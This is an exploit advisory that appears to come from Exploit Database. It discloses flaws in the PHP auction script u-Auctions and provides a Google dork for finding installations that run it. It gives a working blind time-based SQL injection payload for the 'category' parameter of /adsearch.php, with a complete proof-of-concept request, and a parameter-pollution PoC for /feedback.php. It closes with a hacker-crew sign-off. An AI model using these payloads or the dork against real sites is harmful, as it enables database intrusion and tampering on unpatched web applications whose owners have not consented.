u-Auctions – Multiple Vulnerabilities

• Exploit Database
• 34 阅读

• 作者： *Don*
  日期： 2015-04-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36641/

• # Exploit Title: *u-Auctions Multiple Vulnerabilities*
  # Google Dork: "*Powered by u-Auctions** ©*"
  # Date: *03 April 2015*
  # Exploit Author: *Don*
  # Vendor Homepage: https://www.*u-auctions.com <http://u-auctions.com>*/
  # Version: *ALL*
  # Tested on: *Debian*
  
  *1. Blind SQL injection*:
  
  This vulnerability affects */adsearch.php*
  URL encoded POST input *category* was set to
  *(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/*
  
  *POC:*
  
  *http://www <http://www>.targetsite.com
  <http://targetsite.com>/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102*
  
  *Done*
  *+-------------------------------------------------------------------------------------------------------------------------------------+*
  *2. HTTP parameter pollution*
  This vulnerability affects /*feedback.php*
  
  URL encoded GET input *id* was set to *1&n903553=v972172*
  Parameter precedence: *last occurrence*
  Affected parameter: *user_id=1*
  
  The impact depends on the affected web application.
  *An attacker could*:
  *1* = Override existing hardcoded HTTP parameters
  *2* = Modify the application behaviors
  *3* = Access and, potentially exploit, uncontrollable variables
  *4* = Bypass input validation checkpoints and WAFs rules
  
  POC:
  
  *http://www <http://www>.targetsite.com
  <http://targetsite.com>/feedback.php?faction=show&id=1%26n903553%3dv972172*
  *Done*
  *+-------------------------------------------------------------------------------------------------------------------------------------+*
  *There is XSS too but I don't see it useful for anything, so will skip it.*
  *Cheers folks, Don (Balcan Crew) is back! :)*
  *Have fun and have friends!*
  *Shouts to my good friends from past / whoever is online / this website and
  new kids from the localhost.*
  *~Don 2015*